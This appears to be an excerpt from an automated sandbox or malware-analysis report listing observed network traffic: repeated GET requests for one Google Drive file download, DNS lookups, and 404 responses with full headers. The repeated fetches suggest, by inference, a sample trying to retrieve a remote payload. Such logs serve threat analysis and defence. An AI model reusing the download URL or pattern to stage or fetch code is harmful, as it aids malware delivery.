      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:24:49 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-w4Nk7CPE6cfxidFDK9YX1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC4IZ1UKe95e7eiyaX1aQifSrINwSmHefyMRJ9yGRUoyMXvHLj7LxfWRZYFuz7AzwYF6UYyA-cmuUAServer: UploadServerSet-Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw; expires=Wed, 04-Jun-2025 16:24:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:24:54 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GiVm0NDVrADNxPcxz8-9Zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC5o1xYDUqG2ajoJzKaBFJO3k6UCvcQb-NfDTDZBlPl9uxbVYbT57MUJuqbKFxnYNUogLNSt4AHoAAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:00 GMTContent-Security-Policy: script-src 'nonce-le89ienv9uR7cASyrPCOFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5t0y2VtM-CK-EbMKeuohZ7EZ33MFn_5dSNgMjtAUCn_ClnbzqwZJMqZCfeP1avlzNYtcTkifFe7AServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:06 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-NC1mfIp3WMlTLw0xppNdiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7cWWTZeWJfD90XXaSqZQVdCM0zBf2bmj-R7i3r4NmXeT56BbsSLMj5gdgMUFCadqp-fM3HnY0rIwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:11 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-xUDY6CkoU7E52uc_kdM4cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6ByAr539xd3V7MxLKzhTtql6HdNWSZ6ktJXRrgn8eIM1yqzjYCk3fb8YlRTsho7XjX3pEknKsJ3AServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:17 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-2j4stuyg7KoLcVdUEhjvMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5W6vDrPilNTHMEAhKAbFG2rH-PwxMfbrHHuy-YT5fA2KfQ5kpY-6NYLI3k6gWsiPFOmMA5bDtpkgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
